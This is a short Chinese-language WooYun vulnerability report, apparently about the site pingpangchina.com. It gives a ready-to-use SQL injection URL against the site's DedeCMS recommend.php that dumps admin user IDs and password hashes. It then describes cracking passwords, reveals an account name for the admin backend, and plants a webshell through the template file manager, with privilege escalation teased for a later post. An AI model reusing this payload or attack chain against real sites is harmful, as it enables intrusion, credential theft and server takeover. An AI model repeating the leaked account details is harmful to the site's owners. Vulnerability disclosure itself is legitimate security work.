WooYun.org

http://www.pingpangchina.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9%20from%20`%23@__admin`%23
如图：

经过一番努力找到后台地址为：http://www.pingpangchina.com/ppc_admin/login.php?gotopage=%2Fppc_admin%2F
如图：

破解了几个密码，但是有不是管理员权限的账号，最后找到一逗比账号为：
chinacyber tecom
登陆以后有个模板文件管理，点新建文件如图：

这样shell就躺在里面了，如图：

其实还可以测试linux提权，我这里就不测试了因为服务器已经搞定。。。详见第二弹漏洞发布！